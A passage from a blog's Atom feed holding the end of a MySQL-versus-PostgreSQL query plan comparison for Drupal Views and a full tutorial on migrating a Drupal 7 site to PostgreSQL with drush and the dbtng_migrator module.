&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;52438.04..52438.10 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;24 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;52438.04..52552.82 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: &lt;span class='o'&gt;(&lt;/span&gt;count&lt;span class='o'&gt;(&lt;/span&gt;node.nid&lt;span class='o'&gt;))&lt;/span&gt;
         -&amp;gt;  GroupAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50237.67..51155.93 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50237.67..50352.45 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                     Sort Key: taxonomy_term_data.name, taxonomy_index.tid
                     -&amp;gt;  Nested Loop Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..46682.48 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Nested Loop Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..33783.81 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;45913 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Nested Loop  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..18575.38 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Seq Scan on field_data_field_image  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;((&lt;/span&gt;field_image_fid IS NOT NULL&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;((&lt;/span&gt;entity_type&lt;span class='o'&gt;)&lt;/span&gt;::text &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;::text&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 0::smallint&lt;span class='o'&gt;))&lt;/span&gt;
                                       -&amp;gt;  Index Scan using node_pkey on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.43 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; field_data_field_image.entity_id&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Index Scan using taxonomy_index_nid_idx on taxonomy_index  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.36 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;3 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                                       Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; nid&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Index Scan using taxonomy_term_data_pkey on taxonomy_term_data  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..0.27 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                                 Index Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.tid &lt;span class='o'&gt;=&lt;/span&gt; tid&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above plan takes 2 seconds to execute against PostgreSQL. You can see it is very similar to the MySQL plan. It starts with the &lt;code&gt;field_data_field_image&lt;/code&gt; table and performs nested loop joins to join the remainder of the tables. In this case, a sort must be performed before the aggregation that is expensive to perform. Using the HashAggregate operator in PostgreSQL would greatly reduce that cost.&lt;/p&gt;

&lt;p&gt;So you can see out of the box, PostgreSQL performs much better on this query.&lt;/p&gt;

&lt;h2 id='simple_view'&gt;Simple View&lt;/h2&gt;

&lt;p&gt;I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen &lt;a href='/images/view_screen_shot.png'&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The resulting SQL query that gets executed by this view is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='k'&gt;DISTINCT&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;title&lt;/span&gt;                            &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_title&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;                              &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; 
                &lt;span class='n'&gt;node_comment_statistics_comment_count&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
                &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;created&lt;/span&gt;                          &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;INNER&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt; 
         &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;IN&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;111&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;50&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The response time of the query in MySQL versus PostgreSQL is shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/second_query_response_time.png' alt='Second query response time results.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, PostgreSQL can execute the query in question in 200ms or less whereas MySQL can take up to 1000 ms to execute the query.&lt;/p&gt;

&lt;p&gt;The MySQL execution plan looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         &lt;span class='nb'&gt;type&lt;/span&gt;: index
possible_keys: PRIMARY,node_status_type
          key: node_created
      key_len: 4
          ref: NULL
         rows: 100
        Extra: Using where; Using temporary
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node_comment_statistics
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY,comment_count
          key: PRIMARY
      key_len: 4
          ref: drupal.node.nid
         rows: 1
        Extra: Using where
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MySQL chooses to start from the &lt;code&gt;node&lt;/code&gt; table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the &lt;code&gt;DISTINCT&lt;/code&gt;). For each distinct row in the temporary table, MySQL then performs a join to the &lt;code&gt;node_comment_statistics&lt;/code&gt; table by performing an index lookup using its primary key.&lt;/p&gt;

&lt;p&gt;The PostgreSQL execution plan for this query looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6207.15..6207.27 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6207.15..6250.75 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: node.created
         -&amp;gt;  HashAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;5453.36..5627.77 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Hash Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1985.31..5278.95 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;17441 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;42&lt;span class='o'&gt;)&lt;/span&gt;
                     Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; node_comment_statistics.nid&lt;span class='o'&gt;)&lt;/span&gt;
                     -&amp;gt;  Seq Scan on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..2589.32 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38539 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;34&lt;span class='o'&gt;)&lt;/span&gt;
                           Filter: &lt;span class='o'&gt;((&lt;/span&gt;nid &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; 111&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;comment&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 2&lt;span class='o'&gt;))&lt;/span&gt;
                     -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1546.22..1546.22 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;35127 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on node_comment_statistics  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1546.22 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;35127 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                                 Filter: &lt;span class='o'&gt;(&lt;/span&gt;comment_count &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; 2::bigint&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;PostgreSQL chooses to start by scanning the &lt;code&gt;node_comment_statistics&lt;/code&gt; table and building an in-memory hash table. This hash table is then probed for possible mathces of &lt;code&gt;node.nid = node_comment_statistics.nid&lt;/code&gt; for each row that results from a sequential scan of the &lt;code&gt;node&lt;/code&gt; table. The result of this hash join is then aggregated (for the &lt;code&gt;DISTINCT&lt;/code&gt;) before being sorted and limited to 50 rows.&lt;/p&gt;

&lt;p&gt;Its worth noting that with out of the box settings, the above query would do a disk based sort (sort method is viewable using &lt;code&gt;EXPLAIN ANALYZE&lt;/code&gt; in PostgreSQL). When doing a disk based sort, the query takes about 450 ms to execute. I was running all my tests with &lt;code&gt;work_mem&lt;/code&gt; set to 4MB though which results in a top-N heapsort being used.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;In my opinion, the only issue with using PostgreSQL as your Drupal database is that some contributed modules will not work out of the box with that configuration.&lt;/p&gt;

&lt;p&gt;Certainly, from a performance point of view, I see no issues with using PostgreSQL with Drupal. In fact, for Drupal sites using the Views module (probably the majority), I would say PostgreSQL is probably even a better option than MySQL due to its more advanced optimizer and execution engine. This does assume &lt;code&gt;pgbouncer&lt;/code&gt; is being used and Drupal is not connecting directly to PostgreSQL. Users who do not use &lt;code&gt;pgbouncer&lt;/code&gt; and perform simple benchmarks like the ones I did with &lt;code&gt;ab&lt;/code&gt; are likely to see poor performance against PostgreSQL.&lt;/p&gt;

&lt;p&gt;I&amp;#8217;m working a lot with Drupal on PostgreSQL these days. I&amp;#8217;ll be sure to share any interesting experiences I have here.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Migrating Drupal 7 Site from MySQL to PostgreSQL on Ubuntu 10.04</title>
   <link href="http://posulliv.github.com/2012/06/26/migrate-mysql-postgres"/>
   <updated>2012-06-26T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/06/26/migrate-mysql-postgres</id>
   <content type="html">&lt;p&gt;I recently needed to migrate a Drupal 7 site running on a MySQL 5.5 database to a PostgreSQL 9.1 database. This brief post describes the steps I took to achieve this. The steps outlined here were only tested on Ubuntu 10.04&lt;/p&gt;

&lt;p&gt;First, I installed a fresh copy of PostgreSQL 9.1.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo apt-get install python-software-properties
sudo add-apt-repository ppa:pitti/postgresql
sudo apt-get update
sudo apt-get install postgresql-9.1 libpq-dev
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After the installation is complete, a schema and user account is created for Drupal.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo su postgres
createuser -D -A -P drupal
createdb --encoding&lt;span class='o'&gt;=&lt;/span&gt;UTF8 -O drupal drupal
&lt;span class='nb'&gt;exit&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above creates a user account named drupal (you will be prompted for a password for the user account when running the command) and a schema named drupal.&lt;/p&gt;

&lt;p&gt;Next, PostgreSQL needs to be configured to allow connections from Apache for Drupal. This is done by modifying the &lt;code&gt;/etc/postgresql/9.1/main/pg_hba.conf&lt;/code&gt; file. The following line needs to be commented out or deleted:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nb'&gt;local   &lt;/span&gt;all             all                                     peer
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The line to added in this file is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;host    drupal          drupal          127.0.0.1/32            password
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;After this file is modified, PostgreSQL needs to be restarted.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;sudo service postgresql restart
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;For the migration, we are going to assume &lt;a href='http://drupal.org/project/drush'&gt;drush&lt;/a&gt; is installed on the server we will be performing the migration. We are also going to assume MySQL and PostgreSQL are running on the same server although this is certainly not a requirement for these instructions.&lt;/p&gt;

&lt;p&gt;The module that performs the real work of the migration is the &lt;a href='http://drupal.org/project/dbtng_migrator'&gt;dbtng_migrator&lt;/a&gt; module. This module is installed in the same manner as any other Drupal module. After the module is installed, the &lt;code&gt;settings.php&lt;/code&gt; file for your drupal installation then needs to be modified to point to your source and destination database. In my case, I updated my &lt;code&gt;settings.php&lt;/code&gt; file to look like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt; array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;      array (&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;mysql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;dest&amp;#39; =&amp;gt; array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;      array (&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;port&amp;#39; =&amp;gt;&amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;        &amp;#39;prefix&amp;#39; =&amp;gt;&amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      ),&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;As you can see in my case, the default schema that I am currently running on is a MySQL database and I am planning on migrating to a PostgreSQL database running on the same machine.&lt;/p&gt;

&lt;p&gt;Now, to perform the migration from the command line using &lt;code&gt;drush&lt;/code&gt;, its as simple as:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush cache-clear drush
drush dbtng-replicate default dest
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When the migration finishes, output similar to the following will be seen (this is just a small portion of the output):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;$ &lt;/span&gt;drush dbtng-replicate default dest
...
cache_update successfully migrated.                    &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
authmap successfully migrated.                         &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
role_permission successfully migrated.                 &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
role successfully migrated.                            &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
users successfully migrated.                           &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
users_roles successfully migrated.                     &lt;span class='o'&gt;[&lt;/span&gt;status&lt;span class='o'&gt;]&lt;/span&gt;
&lt;span class='err'&gt;$&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally, after the database migration is successfully completed, the &lt;code&gt;settings.php&lt;/code&gt; file needs to be updated to point to the new database. In my case, the database settings after my migration looked like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That was it for my migration. Granted, I had a small drupal site to migrate and the only additional modules I had installed were the views and devel modules so I did not need to worry about contributed modules working with the PostgreSQL database. Next step would be to be configure PostgreSQL in a more optimal which I did not go in to here.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>How Akiban Saves Babies</title>
   <link href="http://posulliv.github.com/2012/05/24/nested-access-intro"/>
   <updated>2012-05-24T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2012/05/24/nested-access-intro</id>
